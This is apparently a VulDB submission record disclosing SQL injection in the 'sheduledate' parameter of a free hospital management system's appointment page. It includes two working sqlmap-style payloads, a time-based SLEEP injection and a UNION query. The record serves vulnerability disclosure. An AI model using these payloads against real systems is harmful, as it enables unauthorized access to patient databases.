| Título | SQL injection in Free Hospital Management System for Small Practices 1.0 |
|---|
| Descripción | There is an SQL injection vulnerability in the 'sheduledate' parameter of /patient/appointment.php.
---
Parameter: sheduledate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sheduledate=2023-08-24' AND (SELECT 7187 FROM (SELECT(SLEEP(5)))sIsM) AND 'mPuB'='mPuB
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: sheduledate=2023-08-24' UNION ALL SELECT 43,43,43,43,43,43,43,CONCAT(0x7170717a71,0x716e716574505a584f787954516777664772734e566b676d717a45666e65774d5a554250687a6748,0x71626b7871),43-- -
--- |
|---|
| Fuente | ⚠️ https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html |
|---|
| Usuario | CuteCabbage (UID 52514) |
|---|
| Sumisión | 2023-08-11 04:08 (hace 3 años) |
|---|
| Moderación | 2023-08-20 09:01 (9 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 237562 [SourceCodester Free Hospital Management System for Small Practices /patient/appointment.php inyección SQL] |
|---|
| Puntos | 20 |
|---|